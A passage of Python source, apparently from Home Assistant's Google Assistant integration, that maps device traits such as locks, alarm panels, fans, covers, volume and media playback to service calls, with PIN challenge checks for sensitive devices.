def sync_attributes(self):
"""Return humidity attributes for a sync request."""
response = {}
attrs = self.state.attributes
domain = self.state.domain
if domain == sensor.DOMAIN:
device_class = attrs.get(ATTR_DEVICE_CLASS)
if device_class == sensor.DEVICE_CLASS_HUMIDITY:
response["queryOnlyHumiditySetting"] = True
elif domain == humidifier.DOMAIN:
response["humiditySetpointRange"] = {
"minPercent": round(
float(self.state.attributes[humidifier.ATTR_MIN_HUMIDITY])
),
"maxPercent": round(
float(self.state.attributes[humidifier.ATTR_MAX_HUMIDITY])
),
}
return response
def query_attributes(self):
"""Return humidity query attributes."""
response = {}
attrs = self.state.attributes
domain = self.state.domain
if domain == sensor.DOMAIN:
device_class = attrs.get(ATTR_DEVICE_CLASS)
if device_class == sensor.DEVICE_CLASS_HUMIDITY:
current_humidity = self.state.state
if current_humidity not in (STATE_UNKNOWN, STATE_UNAVAILABLE):
response["humidityAmbientPercent"] = round(float(current_humidity))
elif domain == humidifier.DOMAIN:
target_humidity = attrs.get(humidifier.ATTR_HUMIDITY)
if target_humidity is not None:
response["humiditySetpointPercent"] = round(float(target_humidity))
return response
async def execute(self, command, data, params, challenge):
"""Execute a humidity command."""
domain = self.state.domain
if domain == sensor.DOMAIN:
raise SmartHomeError(
ERR_NOT_SUPPORTED, "Execute is not supported by sensor"
)
if command == COMMAND_SET_HUMIDITY:
await self.hass.services.async_call(
humidifier.DOMAIN,
humidifier.SERVICE_SET_HUMIDITY,
{
ATTR_ENTITY_ID: self.state.entity_id,
humidifier.ATTR_HUMIDITY: params["humidity"],
},
blocking=True,
context=data.context,
)
@register_trait
class LockUnlockTrait(_Trait):
"""Trait to lock or unlock a lock.
https://developers.google.com/actions/smarthome/traits/lockunlock
"""
name = TRAIT_LOCKUNLOCK
commands = [COMMAND_LOCKUNLOCK]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == lock.DOMAIN
@staticmethod
def might_2fa(domain, features, device_class):
"""Return if the trait might ask for 2FA."""
return True
def sync_attributes(self):
"""Return LockUnlock attributes for a sync request."""
return {}
def query_attributes(self):
"""Return LockUnlock query attributes."""
if self.state.state == STATE_JAMMED:
return {"isJammed": True}
# If its unlocking its not yet unlocked so we consider is locked
return {"isLocked": self.state.state in (STATE_UNLOCKING, STATE_LOCKED)}
async def execute(self, command, data, params, challenge):
"""Execute an LockUnlock command."""
if params["lock"]:
service = lock.SERVICE_LOCK
else:
_verify_pin_challenge(data, self.state, challenge)
service = lock.SERVICE_UNLOCK
await self.hass.services.async_call(
lock.DOMAIN,
service,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
@register_trait
class ArmDisArmTrait(_Trait):
"""Trait to Arm or Disarm a Security System.
https://developers.google.com/actions/smarthome/traits/armdisarm
"""
name = TRAIT_ARMDISARM
commands = [COMMAND_ARMDISARM]
state_to_service = {
STATE_ALARM_ARMED_HOME: SERVICE_ALARM_ARM_HOME,
STATE_ALARM_ARMED_AWAY: SERVICE_ALARM_ARM_AWAY,
STATE_ALARM_ARMED_NIGHT: SERVICE_ALARM_ARM_NIGHT,
STATE_ALARM_ARMED_CUSTOM_BYPASS: SERVICE_ALARM_ARM_CUSTOM_BYPASS,
STATE_ALARM_TRIGGERED: SERVICE_ALARM_TRIGGER,
}
state_to_support = {
STATE_ALARM_ARMED_HOME: alarm_control_panel.const.SUPPORT_ALARM_ARM_HOME,
STATE_ALARM_ARMED_AWAY: alarm_control_panel.const.SUPPORT_ALARM_ARM_AWAY,
STATE_ALARM_ARMED_NIGHT: alarm_control_panel.const.SUPPORT_ALARM_ARM_NIGHT,
STATE_ALARM_ARMED_CUSTOM_BYPASS: alarm_control_panel.const.SUPPORT_ALARM_ARM_CUSTOM_BYPASS,
STATE_ALARM_TRIGGERED: alarm_control_panel.const.SUPPORT_ALARM_TRIGGER,
}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == alarm_control_panel.DOMAIN
@staticmethod
def might_2fa(domain, features, device_class):
"""Return if the trait might ask for 2FA."""
return True
def _supported_states(self):
"""Return supported states."""
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
return [
state
for state, required_feature in self.state_to_support.items()
if features & required_feature != 0
]
def sync_attributes(self):
"""Return ArmDisarm attributes for a sync request."""
response = {}
levels = []
for state in self._supported_states():
# level synonyms are generated from state names
# 'armed_away' becomes 'armed away' or 'away'
level_synonym = [state.replace("_", " ")]
if state != STATE_ALARM_TRIGGERED:
level_synonym.append(state.split("_")[1])
level = {
"level_name": state,
"level_values": [{"level_synonym": level_synonym, "lang": "en"}],
}
levels.append(level)
response["availableArmLevels"] = {"levels": levels, "ordered": False}
return response
def query_attributes(self):
"""Return ArmDisarm query attributes."""
if "next_state" in self.state.attributes:
armed_state = self.state.attributes["next_state"]
else:
armed_state = self.state.state
response = {"isArmed": armed_state in self.state_to_service}
if response["isArmed"]:
response.update({"currentArmLevel": armed_state})
return response
async def execute(self, command, data, params, challenge):
"""Execute an ArmDisarm command."""
if params["arm"] and not params.get("cancel"):
# If no arm level given, we can only arm it if there is
# only one supported arm type. We never default to triggered.
if not (arm_level := params.get("armLevel")):
states = self._supported_states()
if STATE_ALARM_TRIGGERED in states:
states.remove(STATE_ALARM_TRIGGERED)
if len(states) != 1:
raise SmartHomeError(ERR_NOT_SUPPORTED, "ArmLevel missing")
arm_level = states[0]
if self.state.state == arm_level:
raise SmartHomeError(ERR_ALREADY_ARMED, "System is already armed")
if self.state.attributes["code_arm_required"]:
_verify_pin_challenge(data, self.state, challenge)
service = self.state_to_service[arm_level]
# disarm the system without asking for code when
# 'cancel' arming action is received while current status is pending
elif (
params["arm"]
and params.get("cancel")
and self.state.state == STATE_ALARM_PENDING
):
service = SERVICE_ALARM_DISARM
else:
if self.state.state == STATE_ALARM_DISARMED:
raise SmartHomeError(ERR_ALREADY_DISARMED, "System is already disarmed")
_verify_pin_challenge(data, self.state, challenge)
service = SERVICE_ALARM_DISARM
await self.hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{
ATTR_ENTITY_ID: self.state.entity_id,
ATTR_CODE: data.config.secure_devices_pin,
},
blocking=True,
context=data.context,
)
@register_trait
class FanSpeedTrait(_Trait):
"""Trait to control speed of Fan.
https://developers.google.com/actions/smarthome/traits/fanspeed
"""
name = TRAIT_FANSPEED
commands = [COMMAND_FANSPEED, COMMAND_REVERSE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == fan.DOMAIN:
return features & fan.SUPPORT_SET_SPEED
if domain == climate.DOMAIN:
return features & climate.SUPPORT_FAN_MODE
return False
def sync_attributes(self):
"""Return speed point and modes attributes for a sync request."""
domain = self.state.domain
speeds = []
result = {}
if domain == fan.DOMAIN:
reversible = bool(
self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
& fan.SUPPORT_DIRECTION
)
result.update(
{
"reversible": reversible,
"supportsFanSpeedPercent": True,
}
)
elif domain == climate.DOMAIN:
modes = self.state.attributes.get(climate.ATTR_FAN_MODES) or []
for mode in modes:
speed = {
"speed_name": mode,
"speed_values": [{"speed_synonym": [mode], "lang": "en"}],
}
speeds.append(speed)
result.update(
{
"reversible": False,
"availableFanSpeeds": {"speeds": speeds, "ordered": True},
}
)
return result
def query_attributes(self):
"""Return speed point and modes query attributes."""
attrs = self.state.attributes
domain = self.state.domain
response = {}
if domain == climate.DOMAIN:
speed = attrs.get(climate.ATTR_FAN_MODE) or "off"
response["currentFanSpeedSetting"] = speed
if domain == fan.DOMAIN:
percent = attrs.get(fan.ATTR_PERCENTAGE) or 0
response["currentFanSpeedPercent"] = percent
return response
async def execute_fanspeed(self, data, params):
"""Execute an SetFanSpeed command."""
domain = self.state.domain
if domain == climate.DOMAIN:
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_FAN_MODE,
{
ATTR_ENTITY_ID: self.state.entity_id,
climate.ATTR_FAN_MODE: params["fanSpeed"],
},
blocking=True,
context=data.context,
)
if domain == fan.DOMAIN:
await self.hass.services.async_call(
fan.DOMAIN,
fan.SERVICE_SET_PERCENTAGE,
{
ATTR_ENTITY_ID: self.state.entity_id,
fan.ATTR_PERCENTAGE: params["fanSpeedPercent"],
},
blocking=True,
context=data.context,
)
async def execute_reverse(self, data, params):
"""Execute a Reverse command."""
domain = self.state.domain
if domain == fan.DOMAIN:
if self.state.attributes.get(fan.ATTR_DIRECTION) == fan.DIRECTION_FORWARD:
direction = fan.DIRECTION_REVERSE
else:
direction = fan.DIRECTION_FORWARD
await self.hass.services.async_call(
fan.DOMAIN,
fan.SERVICE_SET_DIRECTION,
{ATTR_ENTITY_ID: self.state.entity_id, fan.ATTR_DIRECTION: direction},
blocking=True,
context=data.context,
)
async def execute(self, command, data, params, challenge):
"""Execute a smart home command."""
if command == COMMAND_FANSPEED:
await self.execute_fanspeed(data, params)
elif command == COMMAND_REVERSE:
await self.execute_reverse(data, params)
@register_trait
class ModesTrait(_Trait):
"""Trait to set modes.
https://developers.google.com/actions/smarthome/traits/modes
"""
name = TRAIT_MODES
commands = [COMMAND_MODES]
SYNONYMS = {
"preset mode": ["preset mode", "mode", "preset"],
"sound mode": ["sound mode", "effects"],
"option": ["option", "setting", "mode", "value"],
}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == fan.DOMAIN and features & fan.SUPPORT_PRESET_MODE:
return True
if domain == input_select.DOMAIN:
return True
if domain == select.DOMAIN:
return True
if domain == humidifier.DOMAIN and features & humidifier.SUPPORT_MODES:
return True
if domain == light.DOMAIN and features & light.SUPPORT_EFFECT:
return True
if domain != media_player.DOMAIN:
return False
return features & media_player.SUPPORT_SELECT_SOUND_MODE
def _generate(self, name, settings):
"""Generate a list of modes."""
mode = {
"name": name,
"name_values": [
{"name_synonym": self.SYNONYMS.get(name, [name]), "lang": "en"}
],
"settings": [],
"ordered": False,
}
for setting in settings:
mode["settings"].append(
{
"setting_name": setting,
"setting_values": [
{
"setting_synonym": self.SYNONYMS.get(setting, [setting]),
"lang": "en",
}
],
}
)
return mode
def sync_attributes(self):
"""Return mode attributes for a sync request."""
modes = []
for domain, attr, name in (
(fan.DOMAIN, fan.ATTR_PRESET_MODES, "preset mode"),
(media_player.DOMAIN, media_player.ATTR_SOUND_MODE_LIST, "sound mode"),
(input_select.DOMAIN, input_select.ATTR_OPTIONS, "option"),
(select.DOMAIN, select.ATTR_OPTIONS, "option"),
(humidifier.DOMAIN, humidifier.ATTR_AVAILABLE_MODES, "mode"),
(light.DOMAIN, light.ATTR_EFFECT_LIST, "effect"),
):
if self.state.domain != domain:
continue
if (items := self.state.attributes.get(attr)) is not None:
modes.append(self._generate(name, items))
# Shortcut since all domains are currently unique
break
payload = {"availableModes": modes}
return payload
def query_attributes(self):
"""Return current modes."""
attrs = self.state.attributes
response = {}
mode_settings = {}
if self.state.domain == fan.DOMAIN:
if fan.ATTR_PRESET_MODES in attrs:
mode_settings["preset mode"] = attrs.get(fan.ATTR_PRESET_MODE)
elif self.state.domain == media_player.DOMAIN:
if media_player.ATTR_SOUND_MODE_LIST in attrs:
mode_settings["sound mode"] = attrs.get(media_player.ATTR_SOUND_MODE)
elif self.state.domain == input_select.DOMAIN:
mode_settings["option"] = self.state.state
elif self.state.domain == select.DOMAIN:
mode_settings["option"] = self.state.state
elif self.state.domain == humidifier.DOMAIN:
if ATTR_MODE in attrs:
mode_settings["mode"] = attrs.get(ATTR_MODE)
elif self.state.domain == light.DOMAIN and light.ATTR_EFFECT in attrs:
mode_settings["effect"] = attrs.get(light.ATTR_EFFECT)
if mode_settings:
response["on"] = self.state.state not in (STATE_OFF, STATE_UNKNOWN)
response["currentModeSettings"] = mode_settings
return response
async def execute(self, command, data, params, challenge):
"""Execute a SetModes command."""
settings = params.get("updateModeSettings")
if self.state.domain == fan.DOMAIN:
preset_mode = settings["preset mode"]
await self.hass.services.async_call(
fan.DOMAIN,
fan.SERVICE_SET_PRESET_MODE,
{
ATTR_ENTITY_ID: self.state.entity_id,
fan.ATTR_PRESET_MODE: preset_mode,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == input_select.DOMAIN:
option = settings["option"]
await self.hass.services.async_call(
input_select.DOMAIN,
input_select.SERVICE_SELECT_OPTION,
{
ATTR_ENTITY_ID: self.state.entity_id,
input_select.ATTR_OPTION: option,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == select.DOMAIN:
option = settings["option"]
await self.hass.services.async_call(
select.DOMAIN,
select.SERVICE_SELECT_OPTION,
{
ATTR_ENTITY_ID: self.state.entity_id,
select.ATTR_OPTION: option,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == humidifier.DOMAIN:
requested_mode = settings["mode"]
await self.hass.services.async_call(
humidifier.DOMAIN,
humidifier.SERVICE_SET_MODE,
{
ATTR_MODE: requested_mode,
ATTR_ENTITY_ID: self.state.entity_id,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == light.DOMAIN:
requested_effect = settings["effect"]
await self.hass.services.async_call(
light.DOMAIN,
SERVICE_TURN_ON,
{
ATTR_ENTITY_ID: self.state.entity_id,
light.ATTR_EFFECT: requested_effect,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == media_player.DOMAIN and (
sound_mode := settings.get("sound mode")
):
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_SELECT_SOUND_MODE,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_SOUND_MODE: sound_mode,
},
blocking=True,
context=data.context,
)
_LOGGER.info(
"Received an Options command for unrecognised domain %s",
self.state.domain,
)
return
@register_trait
class InputSelectorTrait(_Trait):
"""Trait to set modes.
https://developers.google.com/assistant/smarthome/traits/inputselector
"""
name = TRAIT_INPUTSELECTOR
commands = [COMMAND_INPUT, COMMAND_NEXT_INPUT, COMMAND_PREVIOUS_INPUT]
SYNONYMS = {}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == media_player.DOMAIN and (
features & media_player.SUPPORT_SELECT_SOURCE
):
return True
return False
def sync_attributes(self):
"""Return mode attributes for a sync request."""
attrs = self.state.attributes
inputs = [
{"key": source, "names": [{"name_synonym": [source], "lang": "en"}]}
for source in attrs.get(media_player.ATTR_INPUT_SOURCE_LIST, [])
]
payload = {"availableInputs": inputs, "orderedInputs": True}
return payload
def query_attributes(self):
"""Return current modes."""
attrs = self.state.attributes
return {"currentInput": attrs.get(media_player.ATTR_INPUT_SOURCE, "")}
async def execute(self, command, data, params, challenge):
"""Execute an SetInputSource command."""
sources = self.state.attributes.get(media_player.ATTR_INPUT_SOURCE_LIST) or []
source = self.state.attributes.get(media_player.ATTR_INPUT_SOURCE)
if command == COMMAND_INPUT:
requested_source = params.get("newInput")
elif command == COMMAND_NEXT_INPUT:
requested_source = _next_selected(sources, source)
elif command == COMMAND_PREVIOUS_INPUT:
requested_source = _next_selected(list(reversed(sources)), source)
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Unsupported command")
if requested_source not in sources:
raise SmartHomeError(ERR_UNSUPPORTED_INPUT, "Unsupported input")
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_SELECT_SOURCE,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_INPUT_SOURCE: requested_source,
},
blocking=True,
context=data.context,
)
@register_trait
class OpenCloseTrait(_Trait):
"""Trait to open and close a cover.
https://developers.google.com/actions/smarthome/traits/openclose
"""
# Cover device classes that require 2FA
COVER_2FA = (
cover.DEVICE_CLASS_DOOR,
cover.DEVICE_CLASS_GARAGE,
cover.DEVICE_CLASS_GATE,
)
name = TRAIT_OPENCLOSE
commands = [COMMAND_OPENCLOSE, COMMAND_OPENCLOSE_RELATIVE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == cover.DOMAIN:
return True
return domain == binary_sensor.DOMAIN and device_class in (
binary_sensor.DEVICE_CLASS_DOOR,
binary_sensor.DEVICE_CLASS_GARAGE_DOOR,
binary_sensor.DEVICE_CLASS_LOCK,
binary_sensor.DEVICE_CLASS_OPENING,
binary_sensor.DEVICE_CLASS_WINDOW,
)
@staticmethod
def might_2fa(domain, features, device_class):
"""Return if the trait might ask for 2FA."""
return domain == cover.DOMAIN and device_class in OpenCloseTrait.COVER_2FA
def sync_attributes(self):
"""Return opening direction."""
response = {}
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
if self.state.domain == binary_sensor.DOMAIN:
response["queryOnlyOpenClose"] = True
response["discreteOnlyOpenClose"] = True
elif (
self.state.domain == cover.DOMAIN
and features & cover.SUPPORT_SET_POSITION == 0
):
response["discreteOnlyOpenClose"] = True
if (
features & cover.SUPPORT_OPEN == 0
and features & cover.SUPPORT_CLOSE == 0
):
response["queryOnlyOpenClose"] = True
if self.state.attributes.get(ATTR_ASSUMED_STATE):
response["commandOnlyOpenClose"] = True
return response
def query_attributes(self):
"""Return state query attributes."""
domain = self.state.domain
response = {}
# When it's an assumed state, we will return empty state
# This shouldn't happen because we set `commandOnlyOpenClose`
# but Google still queries. Erroring here will cause device
# to show up offline.
if self.state.attributes.get(ATTR_ASSUMED_STATE):
return response
if domain == cover.DOMAIN:
if self.state.state == STATE_UNKNOWN:
raise SmartHomeError(
ERR_NOT_SUPPORTED, "Querying state is not supported"
)
position = self.state.attributes.get(cover.ATTR_CURRENT_POSITION)
if position is not None:
response["openPercent"] = position
elif self.state.state != cover.STATE_CLOSED:
response["openPercent"] = 100
else:
response["openPercent"] = 0
elif domain == binary_sensor.DOMAIN:
if self.state.state == STATE_ON:
response["openPercent"] = 100
else:
response["openPercent"] = 0
return response
async def execute(self, command, data, params, challenge):
"""Execute an Open, close, Set position command."""
domain = self.state.domain
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
if domain == cover.DOMAIN:
svc_params = {ATTR_ENTITY_ID: self.state.entity_id}
should_verify = False
if command == COMMAND_OPENCLOSE_RELATIVE:
position = self.state.attributes.get(cover.ATTR_CURRENT_POSITION)
if position is None:
raise SmartHomeError(
ERR_NOT_SUPPORTED,
"Current position not know for relative command",
)
position = max(0, min(100, position + params["openRelativePercent"]))
else:
position = params["openPercent"]
if position == 0:
service = cover.SERVICE_CLOSE_COVER
should_verify = False
elif position == 100:
service = cover.SERVICE_OPEN_COVER
should_verify = True
elif features & cover.SUPPORT_SET_POSITION:
service = cover.SERVICE_SET_COVER_POSITION
if position > 0:
should_verify = True
svc_params[cover.ATTR_POSITION] = position
else:
raise SmartHomeError(
ERR_NOT_SUPPORTED, "No support for partial open close"
)
if (
should_verify
and self.state.attributes.get(ATTR_DEVICE_CLASS)
in OpenCloseTrait.COVER_2FA
):
_verify_pin_challenge(data, self.state, challenge)
await self.hass.services.async_call(
cover.DOMAIN, service, svc_params, blocking=True, context=data.context
)
@register_trait
class VolumeTrait(_Trait):
"""Trait to control volume of a device.
https://developers.google.com/actions/smarthome/traits/volume
"""
name = TRAIT_VOLUME
commands = [COMMAND_SET_VOLUME, COMMAND_VOLUME_RELATIVE, COMMAND_MUTE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if trait is supported."""
if domain == media_player.DOMAIN:
return features & (
media_player.SUPPORT_VOLUME_SET | media_player.SUPPORT_VOLUME_STEP
)
return False
def sync_attributes(self):
"""Return volume attributes for a sync request."""
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
return {
"volumeCanMuteAndUnmute": bool(features & media_player.SUPPORT_VOLUME_MUTE),
"commandOnlyVolume": self.state.attributes.get(ATTR_ASSUMED_STATE, False),
# Volume amounts in SET_VOLUME and VOLUME_RELATIVE are on a scale
# from 0 to this value.
"volumeMaxLevel": 100,
# Default change for queries like "Hey Google, volume up".
# 10% corresponds to the default behavior for the
# media_player.volume{up,down} services.
"levelStepSize": 10,
}
def query_attributes(self):
"""Return volume query attributes."""
response = {}
level = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_LEVEL)
if level is not None:
# Convert 0.0-1.0 to 0-100
response["currentVolume"] = int(level * 100)
muted = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_MUTED)
if muted is not None:
response["isMuted"] = bool(muted)
return response
async def _set_volume_absolute(self, data, level):
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_VOLUME_SET,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_MEDIA_VOLUME_LEVEL: level,
},
blocking=True,
context=data.context,
)
async def _execute_set_volume(self, data, params):
level = max(0, min(100, params["volumeLevel"]))
if not (
self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
& media_player.SUPPORT_VOLUME_SET
):
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
await self._set_volume_absolute(data, level / 100)
async def _execute_volume_relative(self, data, params):
relative = params["relativeSteps"]
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
if features & media_player.SUPPORT_VOLUME_SET:
current = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_LEVEL)
target = max(0.0, min(1.0, current + relative / 100))
await self._set_volume_absolute(data, target)
elif features & media_player.SUPPORT_VOLUME_STEP:
svc = media_player.SERVICE_VOLUME_UP
if relative < 0:
svc = media_player.SERVICE_VOLUME_DOWN
relative = -relative
for _ in range(relative):
await self.hass.services.async_call(
media_player.DOMAIN,
svc,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
async def _execute_mute(self, data, params):
mute = params["mute"]
if not (
self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
& media_player.SUPPORT_VOLUME_MUTE
):
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_VOLUME_MUTE,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_MEDIA_VOLUME_MUTED: mute,
},
blocking=True,
context=data.context,
)
async def execute(self, command, data, params, challenge):
"""Execute a volume command."""
if command == COMMAND_SET_VOLUME:
await self._execute_set_volume(data, params)
elif command == COMMAND_VOLUME_RELATIVE:
await self._execute_volume_relative(data, params)
elif command == COMMAND_MUTE:
await self._execute_mute(data, params)
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
def _verify_pin_challenge(data, state, challenge):
"""Verify a pin challenge."""
if not data.config.should_2fa(state):
return
if not data.config.secure_devices_pin:
raise SmartHomeError(ERR_CHALLENGE_NOT_SETUP, "Challenge is not set up")
if not challenge:
raise ChallengeNeeded(CHALLENGE_PIN_NEEDED)
if challenge.get("pin") != data.config.secure_devices_pin:
raise ChallengeNeeded(CHALLENGE_FAILED_PIN_NEEDED)
def _verify_ack_challenge(data, state, challenge):
"""Verify an ack challenge."""
if not data.config.should_2fa(state):
return
if not challenge or not challenge.get("ack"):
raise ChallengeNeeded(CHALLENGE_ACK_NEEDED)
MEDIA_COMMAND_SUPPORT_MAPPING = {
COMMAND_MEDIA_NEXT: media_player.SUPPORT_NEXT_TRACK,
COMMAND_MEDIA_PAUSE: media_player.SUPPORT_PAUSE,
COMMAND_MEDIA_PREVIOUS: media_player.SUPPORT_PREVIOUS_TRACK,
COMMAND_MEDIA_RESUME: media_player.SUPPORT_PLAY,
COMMAND_MEDIA_SEEK_RELATIVE: media_player.SUPPORT_SEEK,
COMMAND_MEDIA_SEEK_TO_POSITION: media_player.SUPPORT_SEEK,
COMMAND_MEDIA_SHUFFLE: media_player.SUPPORT_SHUFFLE_SET,
COMMAND_MEDIA_STOP: media_player.SUPPORT_STOP,
}
MEDIA_COMMAND_ATTRIBUTES = {
COMMAND_MEDIA_NEXT: "NEXT",
COMMAND_MEDIA_PAUSE: "PAUSE",
COMMAND_MEDIA_PREVIOUS: "PREVIOUS",
COMMAND_MEDIA_RESUME: "RESUME",
COMMAND_MEDIA_SEEK_RELATIVE: "SEEK_RELATIVE",
COMMAND_MEDIA_SEEK_TO_POSITION: "SEEK_TO_POSITION",
COMMAND_MEDIA_SHUFFLE: "SHUFFLE",
COMMAND_MEDIA_STOP: "STOP",
}
@register_trait
class TransportControlTrait(_Trait):
"""Trait to control media playback.
https://developers.google.com/actions/smarthome/traits/transportcontrol
"""
name = TRAIT_TRANSPORT_CONTROL
commands = [
COMMAND_MEDIA_NEXT,
COMMAND_MEDIA_PAUSE,
COMMAND_MEDIA_PREVIOUS,
COMMAND_MEDIA_RESUME,
COMMAND_MEDIA_SEEK_RELATIVE,
COMMAND_MEDIA_SEEK_TO_POSITION,
COMMAND_MEDIA_SHUFFLE,
COMMAND_MEDIA_STOP,
]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == media_player.DOMAIN:
for feature in MEDIA_COMMAND_SUPPORT_MAPPING.values():
if features & feature:
return True
return False
def sync_attributes(self):
"""Return opening direction."""
response = {}
if self.state.domain == media_player.DOMAIN:
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
support = []
for command, feature in MEDIA_COMMAND_SUPPORT_MAPPING.items():
if features & feature:
support.append(MEDIA_COMMAND_ATTRIBUTES[command])
response["transportControlSupportedCommands"] = support
return response
def query_attributes(self):
"""Return the attributes of this trait for this entity."""
return {}
async def execute(self, command, data, params, challenge):
"""Execute a media command."""
service_attrs = {ATTR_ENTITY_ID: self.state.entity_id}
if command == COMMAND_MEDIA_SEEK_RELATIVE:
service = media_player.SERVICE_MEDIA_SEEK
rel_position = params["relativePositionMs"] / 1000
seconds_since = 0 # Default to 0 seconds
if self.state.state == STATE_PLAYING:
now = dt.utcnow()
upd_at = self.state.attributes.get(
media_player.ATTR_MEDIA_POSITION_UPDATED_AT, now
)
seconds_since = (now - upd_at).total_seconds()
position = self.state.attributes.get(media_player.ATTR_MEDIA_POSITION, 0)
max_position = self.state.attributes.get(
media_player.ATTR_MEDIA_DURATION, 0
)
service_attrs[media_player.ATTR_MEDIA_SEEK_POSITION] = min(
max(position + seconds_since + rel_position, 0), max_position
)
elif command == COMMAND_MEDIA_SEEK_TO_POSITION:
service = media_player.SERVICE_MEDIA_SEEK
max_position = self.state.attributes.get(
media_player.ATTR_MEDIA_DURATION, 0
)
service_attrs[media_player.ATTR_MEDIA_SEEK_POSITION] = min(
max(params["absPositionMs"] / 1000, 0), max_position
)
elif command == COMMAND_MEDIA_NEXT:
service = media_player.SERVICE_MEDIA_NEXT_TRACK
elif command == COMMAND_MEDIA_PAUSE:
service = media_player.SERVICE_MEDIA_PAUSE
elif command == COMMAND_MEDIA_PREVIOUS:
service = media_player.SERVICE_MEDIA_PREVIOUS_TRACK
elif command == COMMAND_MEDIA_RESUME:
service = media_player.SERVICE_MEDIA_PLAY
elif command == COMMAND_MEDIA_SHUFFLE:
service = media_player.SERVICE_SHUFFLE_SET
# Google Assistant only supports enabling shuffle
service_attrs[media_player.ATTR_MEDIA_SHUFFLE] = True
elif command == COMMAND_MEDIA_STOP:
service = media_player.SERVICE_MEDIA_STOP
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
await self.hass.services.async_call(
media_player.DOMAIN,
service,
service_attrs,
blocking=True,
context=data.context,
)
@register_trait
class MediaStateTrait(_Trait):
"""Trait to get media playback state.
https://developers.google.com/actions/smarthome/traits/mediastate
"""
name = TRAIT_MEDIA_STATE
commands = []
activity_lookup = {
STATE_OFF: "INACTIVE",
STATE_IDLE: "STANDBY",
STATE_PLAYING: "ACTIVE",
STATE_ON: "STANDBY",
STATE_PAUSED: "STANDBY",
STATE_STANDBY: "STANDBY",
STATE_UNAVAILABLE: "INACTIVE",
STATE_UNKNOWN: "INACTIVE",
}
playback_lookup = {
STATE_OFF: "STOPPED",
STATE_IDLE: "STOPPED",
STATE_PLAYING: "PLAYING",
STATE_ON: "STOPPED",
STATE_PAUSED: "PAUSED",
STATE_STANDBY: "STOPPED",
STATE_UNAVAILABLE: "STOPPED",
STATE_UNKNOWN: "STOPPED",
}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == media_player.DOMAIN
def sync_attributes(self):
"""Return attributes for a sync request."""
return {"supportActivityState": True, "supportPlaybackState": True}
def query_attributes(self):
"""Return the attributes of this trait for this entity."""
return {
"activityState": self.activity_lookup.get(self.state.state, "INACTIVE"),
"playbackState": self.playback_lookup.get(self.state.state, "STOPPED"),
}
@register_trait
class ChannelTrait(_Trait):
"""Trait to get media playback state.
https://developers.google.com/actions/smarthome/traits/channel
"""
name = TRAIT_CHANNEL
commands = [COMMAND_SELECT_CHANNEL]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if (
domain == media_player.DOMAIN
and (features & media_player.SUPPORT_PLAY_MEDIA)
and device_class == media_player.DEVICE_CLASS_TV
):
return True
return False
def sync_attributes(self):
"""Return attributes for a sync request."""
return {"availableChannels": [], "commandOnlyChannels": True}
def query_attributes(self):
"""Return channel query attributes."""
return {}
async def execute(self, command, data, params, challenge):
"""Execute an setChannel command."""
if command == COMMAND_SELECT_CHANNEL:
channel_number = params.get("channelNumber")
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Unsupported command")
if not channel_number:
raise SmartHomeError(
ERR_NO_AVAILABLE_CHANNEL,
"Channel is not available",
)
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_PLAY_MEDIA,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_MEDIA_CONTENT_ID: channel_number,
media_player.ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
},
blocking=True,
context=data.context,
)
@register_trait
class SensorStateTrait(_Trait):
"""Trait to get sensor state.
https://developers.google.com/actions/smarthome/traits/sensorstate
"""
sensor_types = {
